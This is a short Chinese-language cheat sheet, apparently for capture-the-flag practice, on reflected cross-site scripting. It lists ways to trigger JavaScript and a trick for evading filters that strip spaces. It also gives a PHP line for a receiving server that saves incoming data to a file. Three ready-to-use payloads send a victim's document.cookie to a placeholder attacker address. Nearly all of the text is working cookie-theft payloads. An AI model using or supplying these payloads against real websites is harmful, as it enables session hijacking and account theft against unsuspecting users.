写在开头可能会用到的提示

• 执行js代码的几种方式
• <script>代码</script>
• <body onload="代码"></body>
• 标签空格被过滤，可以用/**/

案例

反射性XSS

• 思路:将JS代码插入后，如果被访问，那么就会执行JS代码，将插入的地址+cookie反射给反射机，相当于传参了
• 反射机关键php代码，file_put_contents('./tmp/flag.txt',$_GET['shell']);
• 注入代码(推荐):<body onload="window.location.href='你的反射机地址'+document.cookie"></body>
• 注入代码:<script>document.location.href='你的反射机地址'+document.cookie</script>
• 注入代码:<script>window.location.href='你的反射机地址'+document.cookie</script>